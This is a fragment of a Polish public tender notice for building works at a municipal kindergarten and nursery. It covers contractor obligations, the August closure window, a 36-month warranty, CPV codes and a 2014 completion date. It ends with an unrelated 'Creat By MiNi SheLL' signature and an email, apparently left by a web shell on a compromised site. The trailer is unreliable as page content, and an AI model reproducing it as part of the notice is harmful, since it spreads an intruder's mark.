Wykonawca ma obowiązek zapoznania się w sposób bardzo szczegółowy z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, przedmiarem robót oraz warunkami umowy. Wykonawca ma obowiązek wyjaśnić z Zamawiającym wszystkie wątpliwości w stosunku do zakresu zawartego w przywołanych dokumentach, przed złożeniem ofert. Po złożeniu oferty, Zamawiający będzie uważał, że Wykonawca nie ma wątpliwości i uwag w stosunku do zakresu ujętego w specyfikacji. 
Zamawiający informuje, że w okresie od 1 sierpnia do 31 sierpnia Przedszkole Publiczne i Żłobek Miejski będą nieczynne i w tym czasie roboty mogą być prowadzone bez przeszkód. Prowadzenie prac poza tym okresem należy wykonywać w uzgodnieniu z Dyrekcją przedszkola i żłobka.
Zamawiający wymaga, aby Wykonawca udzielił gwarancji wynoszącej minimum 36 miesięcy na wykonane i odebrane roboty.
Integralną część opisu przedmiotu zamówienia stanowi:
1.	dokumentacja projektowa,
2.	specyfikacja techniczna wykonania i odbioru robót,
3.	przedmiar robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.27.23-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com